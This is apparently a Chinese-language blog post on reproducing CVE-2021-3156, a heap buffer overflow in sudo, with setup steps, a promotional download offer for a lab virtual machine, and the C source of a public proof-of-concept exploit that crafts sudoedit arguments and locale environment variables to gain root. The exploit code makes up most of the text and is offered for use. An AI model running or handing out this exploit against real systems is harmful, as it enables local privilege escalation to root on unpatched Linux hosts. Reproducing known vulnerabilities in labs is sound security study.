CVE-2021-3156：Sudo 堆缓冲区溢出漏洞 复现过程

目前exp在ubuntu 20.04环境下稳定运行，其他linux发行版未测试

环境已经上传至百度云盘中，请关注公众号并后台回复sudo获取下载链接。
虚拟机的用户名密码为 vagrant/unicodesec

复现过程

根目录中进入CVE-2021-3156文件夹中，执行make编译项目，随后执行sudo-hax-me-a-sandwich

过程如下图所示

exp代码如下

int main(int argc, char *argv[]) {
	// CTF quality exploit below.
	char *s_argv[]={
		"sudoedit",
		"-u", "root", "-s",
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\",
		"\\",
		"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB123456\\",
		NULL
	};

	char *s_envp[]={
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\",  
		"X/P0P_SH3LLZ_", "\\",
		"LC_MESSAGES=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
		"LC_ALL=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
		"LC_CTYPE=C.UTF-8@AAAAAAAAAAAAAA",
		NULL
	};

	printf("**** CVE-2021-3156 PoC by blasty <peter@haxx.in>\n");

	execve(SUDOEDIT_PATH, s_argv, s_envp);

	return 0;
}